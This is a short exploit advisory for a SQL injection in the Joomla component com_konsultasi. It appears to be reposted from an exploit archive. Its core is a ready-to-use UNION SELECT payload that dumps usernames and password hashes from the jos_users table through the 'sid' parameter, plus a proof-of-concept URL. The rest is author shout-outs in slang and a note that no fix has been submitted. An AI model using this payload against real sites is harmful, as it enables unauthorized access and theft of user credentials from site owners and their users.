Joomla Component com_konsultasi SQL Injection Vulnerability
2010-05-13 10:03:42-------------------------------------------------------------------------
Joomla Component com_konsultasi (sid) SQL Injection Vulnerability
-------------------------------------------------------------------------
Author : c4uR
Date : May, 13, 2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
-------------------------------------------------------------------------
Esploit :
----------
-5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--
SQLi p0c :
-----------
http://127.0.0.1/[gubrak]/index.php?option=com_konsultasi&act=detail&sid=[gubrak]
-------------------------------------------------------------------------
crott :
-----------
[+] Malingsial sempak, crott... crott... crott...
[+] tian(tangannye jgn nakal)+GheMaX(byk
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.